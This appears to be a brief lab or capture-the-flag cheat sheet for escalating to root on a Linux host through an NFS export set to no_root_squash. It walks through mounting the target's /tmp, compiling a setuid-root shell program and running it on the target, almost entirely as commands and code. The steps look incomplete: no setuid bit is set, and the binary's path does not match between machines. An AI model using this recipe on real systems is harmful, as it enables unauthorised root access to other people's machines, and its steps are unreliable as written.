NFS Root Squashing

Enumeration

• cat /etc/exports in our example the "no root squash is defined for the tmp export. The folder is sharable and can be mounted

Exploitation

In our attacking machine

• showmount -e IP-OF-TARGET list the mountable folder of our target
• mkdir /tmp/1

• mount -o rw,vers=2 10.10.32.193:/tmp /tmp/1 we mount our folder

• echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c

• gcc /tmp/1/x.c -o /tmp/1/x

In our target

• /tmp/x we can execute our binary

• We should be root!